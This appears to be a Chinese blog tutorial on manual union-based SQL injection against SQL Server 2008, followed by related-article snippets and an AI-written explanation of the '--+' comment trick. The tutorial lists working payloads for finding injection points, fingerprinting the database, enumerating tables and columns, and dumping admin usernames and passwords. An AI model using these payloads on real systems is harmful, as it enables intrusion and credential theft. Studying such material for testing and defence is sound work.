SQL注入--sql server

最新推荐文章于 2024-05-15 22:06:46 发布
原创 最新推荐文章于 2024-05-15 22:06:46 发布 · 970 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#SQL注入

本文介绍SQL注入的基础原理及实战步骤,包括如何判断注入点、确定数据库类型、获取数据库信息等,详细展示了针对SQL Server 2008的具体操作流程。

谈到SQL注入,不得不提它的本质,把用户的输入数据当做代码来执行。两个关键条件,第一个是用户能够控制的输入;第二个是程序要执行的代码,拼接了用户输入的数据

按照注入的技术类型可分解为:

显错注入和盲注入,其中盲注入可分为,联合查询注入,堆查询注入,DNS查询注入,报错注入,延时注入和布尔注入。这篇文章重点在分享一些联合查询注入的命令


1.首先来判断注入点(URL类)

当目标URL为:www.target.com/1.php?id=88时,来进行简单的注入点判断;

www.target.com/1.php?id=88-0 无变化
www.target.com/1.php?id=88-1 报错


www.target.com/1.php?id=88 and 1=1 无变化
www.target.com/1.php?id=88-1 and 1=2 报错

2.判断是何种数据库
URL+/*!%20s*/ 错误则是MySQL;URL+/*pc 正常为MySQL

URL+and exists(select @@version)-- 正常为SQL Server

3.SQL Server 2008注入过程

判断字段数:

id=1/**/Order/**/By/**/5/**/-- 正常则字段数≥5      --和/**/均为注释用来注释执行语句时的代码 保证注入代码正常执行
id=1/**/Order/**/By/**/6/**/-- 错误则字段数<6

判断数据类型,字符型就可以SQL注入了

id=1/**/union/**/all/**/select/**/NULL,NULL,NULL,NULL,NULL--   正常
id=1/**/union/**/all/**/select/**/NULL,NULL,’test’,NULL,NULL--    正常 (一位一位去尝试)

显示数据库版本
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,NULL,@@version,NULL,NULL--

当前库名
and/**/1=2/**/union/**/all/**/select/**/NULL,db_name(),NULL,NULL,NULL from sysobjects--

指定库表名
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from库名..sysobjects where xtype='u' and name not in(select top 0 name from 库名..sysobjects where
xtype='u')),NULL,NULL,NULL from sysobjects--

当前库查询表

and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype='u' and name not in(select top 0 name from sysobjects where
xtype='u')),NULL,NULL,NULL from sysobjects--     //第二个top从0开始输入 1,2,....列出当前库所有表名

查询admin变内的字段

d=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 1 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL fromsysobjects--//第二个top从0开始遍历

查看admin变字段id,username,password的内容

id=1 and 1=2 union all select id,username,password,NULL,NULL from admin--

webshell写入和系统命令执行就不能再分享了





SQL Server手工注入方式
渗透之路,攻防之间皆学问
01-04 7523
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
SQL注入--DNSlog外带注入--理论
m0_56019217的博客
11-23 1196
DNS的作用是将域名解析为IP而DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名访问信息。可以理解为DNS服务器上的日志文件。比如,以点为分隔,从右向左依次是顶级域名、二级域名、三级域名。即,net是顶级域名,csdn是二级域名,blog是三级域名。域名不区分大小写。在进行ping命令时会使用DNS解析:这里就是被解析后,与csdn.com进行了拼接,然后再去执行Ping命令。这里我们界面就回显得到了,也就是得到了的值。这个过程就可以被称为DNSlog外带。
SQL Server注入大全及防御
网络 人生 学习 进步
09-17 1554
  SQL Server是中小型网站广泛使用的数据库,由于功能强大也滋生了很多安全问题,国内又因为SQL注入攻击的很长一段时间流行,导致对SQL Server的入侵技巧也层出不穷,由于SQL Server支持多语句,相信很多小黑在对SQL Server进去SQL注入的时候很少使用猜解表名之类的方法,而直接转向使用SQL Server的存储过程和函数快速的拿权限,下面我就围绕SQL Server的系
1、sql server数据库进行sql注入
weixin_51520483的博客
05-15 1429
1、判断数据类型是很重要的一点,影响后面的注入语句2、确定列数时,要多测几组数据,从而分析判断列数,并不是遇到第一个报错就停止测试3、正常网页(例如id=1,参数正确)没有注入回显时,试试报错情况(id=-1),注入回显有可能被正常返回数据覆盖4、注入回显的字段有可能整形、字符、小数等,注意是否需要单引号5、最好先全部统一会先字段类型,比如全部整形,挨个轮流改变为字符形。
SQL server注入
weixin_45958861的博客
09-20 1681
较为复杂 一般不用手工 用工具 1.注入语句 ①*判断数据库类型 and exists (select * from sysobjects)–返回正常为mssql(也名sql server) and exists (select count() from sysobjects)–有时上面那个语句不行就试试这个哈 ②判断数据库版本 and 1=@@version–这个语句要在有回显的模式下才可以哦 and substring((select @@version),22,4)=‘2008’–适用
SQL Server 注入
mingyqf的博客
03-22 2725
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
java 连接sqlserver使用的java-sqlserver-connect.jar包
04-09
在本例中,我们关注的是"java-sqlserver-connect.jar",这是一个专门为Java应用程序提供与Microsoft SQL Server数据库交互功能的库。这个JAR文件支持两个不同的Java运行时环境(JRE),即JRE7和JRE8。 首先,了解...
网络安全-sql注入-sqlmap
09-02
其中,SQL注入攻击是一种常见的网络安全威胁,它是一种代码注入技术,通过在Web表单输入或页面请求的查询字符串中注入恶意的SQL代码,攻击者可以操纵后端数据库,从而获得未授权的数据库访问权限,对数据进行读取、...
sqlserver-demo:Spring Boot + Mybatis-Plus + SQLServer
03-04
以上就是"sqlserver-demo"项目涉及的核心知识点,通过这个项目,你可以深入了解如何在Spring Boot应用中集成Mybatis-Plus和SQLServer,以及如何构建一个高效、稳定的数据库操作层。在实际开发过程中,还需要不断学习...
09-sql注入-mssql1
08-03
SQL注入是一种常见的安全漏洞,攻击者通过输入恶意SQL语句来获取未授权的数据或执行恶意操作。针对SQL Server,攻击者可能使用的注入技术包括: 1. 判断是否存在注入漏洞。 2. 确定数据库类型。 3. 猜测表名和字段。...
SQL注入的一个ASP网站源码
02-06
SQL注入的一个ASP网站源码,ASP+ACCESS手动注入环境搭建,用来练手不错! 带SQL注入的一个ASP网站源码,ASP+ACCESS手动注入环境搭建,用来练手不错!
sql server 2008 mysql 手工注入
03-25
本人原创 sql server 2008 mysql 手工注入 里面有源码和数据库文件 还有用于测试的项目
整理出来的SQL注入点关键字
03-06
整理出来的关于SQL注入时所需要的关键字,很全面,覆盖了很多,包括asp,php等等
SQL Server注入
weixin_34129145的博客
11-05 149
1.利用错误消息提取信息 1.1 枚举当前表与列 select * from users where username='root' and password='root' having 1=1--' 抛出错误:选择列表中的列 'users.id' 无效,因为该列没有包含在聚合函数或 GROUP BY 子句中。   发现表名为 'users',存在列名为 'id' sele...
专门针对SQL Server注入手段
Wayne_Deng的专栏
07-13 1352
小弟潜心研究sql injection一个余月,发现国内存在sql injection漏洞的网站一大把一大把,80%以上的asp网站都似乎是不学无术、骗吃骗喝的“程序员”所做。不光漏洞多,而且网站内部结构也是零乱无比…… 关于sql injection网上流传甚广的SQL注入天书可以说是非常不错的入门介绍了,在这里也要重复一些老套的手法。 首先上手的都是1=1,1=2的方法测试验证漏洞,字符则用
SQL server 中的SQL 注入
d1996a的博客
09-27 526
SQL server 中的sql注入 实验环境: 在windows server 2008虚拟机中安装SQL server 数据库。安装phpstudy ,通过一台Windows7 访问连接windows server 2008. SQL server 联合注入 首先判断注入点,输入id=1,页面正常回显。 首先判断是否是数值型: id=1 and 1=1,页面正常回显 id=1 and 1=2,页面空显示,可以判断是数值型。 因为有显示位,可以用联合注入进行注入。 首先判断显示位,由此可以看出显示位
【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入SQL注入点利用以及getshell
m0_67844671的博客
10-02 3154
【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】-优快云博客本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
2004-8-5+ 给mssql添加用户
weixin_34113237的博客
06-29 142
打开管理器,找到需要添加用户的数据库,点开,右键单击用户,选择“新建数据库用户”,弹出“数据库用户属性-新建用户”,填好登陆名和用户名,分配好角色,然后就可以啦。先看登陆名。一般从下拉列表里选“新建”,跳出“sql server登录属性-新建登录”,然后在这里填名称,设定sel servr身份验证的密码,然后从下拉列表里选一个数据库,就是你要添加用户的那个,完事后确定。这样在登陆名下拉列表就会多出...
sqlserver注入
ka_ka11的博客
04-22 734
1.判断权限大小,即xcmd_shell能不能用 2.数据库,表,列的逻辑问题
SQL注入 --+什么意思
最新发布
10-17
<think>首先,用户的问题是:我想了解SQL注入中 '--+' 的含义。用户提供了几个引用,我必须参考这些引用来回答。 回顾系统级指令: - 所有行内数学表达式用$...$格式。 - 独立公式用$$...$$格式。 - 使用中文回答。 - 生成相关问题。 - 引用段落末尾添加引用标识,如[^1]。 用户提到的引用: - 引用[1]:字符型注入示例。 - 引用[2]:测试语句解释。 - 引用[3]:详细介绍 '--+' 和 '#' 的区别。 - 引用[4]:关于Cookie的定义,不相关。 关键引用是引用[3],因为它直接解释 '--+' 的含义。 从引用[3],我可以总结: - '--+' 用于注释掉SQL语句的后续部分。 -SQL注入中,它用于避免语法错误,使注入的恶意代码生效。 - '+' 代替空格,因为空格可能被过滤或需要编码。 - 它类似于 '%23'(#的编码),但 '--+' 有更好的兼容性。 用户的问题具体是:'--+' 的含义。 结构回答: - 解释 '--+' 是什么。 - 说明其在SQL注入中的作用。 - 提供示例。 - 末尾添加引用。 - 最后,生成相关问题。 使用中文回答。 回答结构: 1. 清晰定义:'--+' 是SQL注入中的一种注释符号。 2. 功能:用于注释掉SQL语句剩余部分,使注入的条件生效。 3. 为什么用 '+':'+' 编码为空格,避免空格被过滤。 4. 示例:如引用[3]中的。 5. 引用添加:在相关段落末尾。 6. 生成相关问题。 生成相关问题: - 基于主题:SQL注入、注释技术、防范措施等。 - 参考系统示例:快速排序相关问题类似。 最终回答结构: - 先回答用户问题。 - 然后列出相关问题。 </think>### SQL注入中 '--+' 的含义 在SQL注入攻击中,'--+' 是一种用于**注释掉SQL语句后续部分**的特殊符号组合。它主要用于绕过应用程序的输入验证,使攻击者注入的恶意代码生效而不引起语法错误。以下是详细解释: 1. **基本功能**: - SQL注入时,攻击者需要在合法SQL查询中插入额外条件(如 `OR 1=1`),但原始查询可能有后续代码(如 `AND password='xxx'`)。 - '--' 是SQL的标准单行注释符(表示忽略其后的所有内容),但空格字符(` `)常被Web应用程序过滤或编码。"+" 在这里被用作空格的替代(URL编码中,"+" 等同于空格),因此 '--+' 组合起来等同于 `-- `(一个注释符后紧跟空格)。 - 例如,在引用[3]的示例中,注入 `--+` 后,SQL查询变为: ```sql SELECT * FROM users WHERE id='1' OR 1=1 -- +' AND password='xxx' ``` 其中 `-- +` 注释掉了 `' AND password='xxx'` 部分,使整个查询仅执行 `id='1' OR 1=1`(永真条件,绕过认证)[^3]。 2. **为什么使用 '+' 而不是空格**: - 在实际注入中,空格字符可能被Web应用防火墙(WAF)或输入过滤器拦截。"+" 是一种绕过机制,因为URL编码规则中,"+" 会被服务器解码为空格(例如,`%20` 是空格的编码,但 '+' 更常用于简化)。 - 这提高了注入的相容性,适用于多种数据库(如MySQL、Oracle、SQL Server),而其他注释符如 "#"(仅MySQL原生支持)可能受限[^3]。 3. **典型应用场景**: - 用于测试注入点是否存在(如引用[2]所示)。例如,输入 `?id=1' AND 1=1 --+`,如果页面正常返回,表明注入点有效且注释生效[^2]。 - 在字符型注入中(如引用[1]的后台SQL语句 `WHERE id=('$id')`),注入 '--+' 可闭合单引号并注释剩余部分,防止语法错误[^1]。 4. **注意事项**: - '--+' 不是唯一选择;在MySQL环境中,可使用 "#"(需编码为 `%23`),但 '--+' 通用性更强。 - 实际中,攻击者可能调整符号顺序(如 `--%20`)以适应不同过滤规则。 总之,'--+' 是SQL注入的一种关键注释技术,通过模拟空格确保注释生效,从而操控SQL逻辑。防范措施包括使用参数化查询和输入过滤[^3]。 如果您的查询涉及其他细节(如数据库类型或实战示例),请补充说明!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值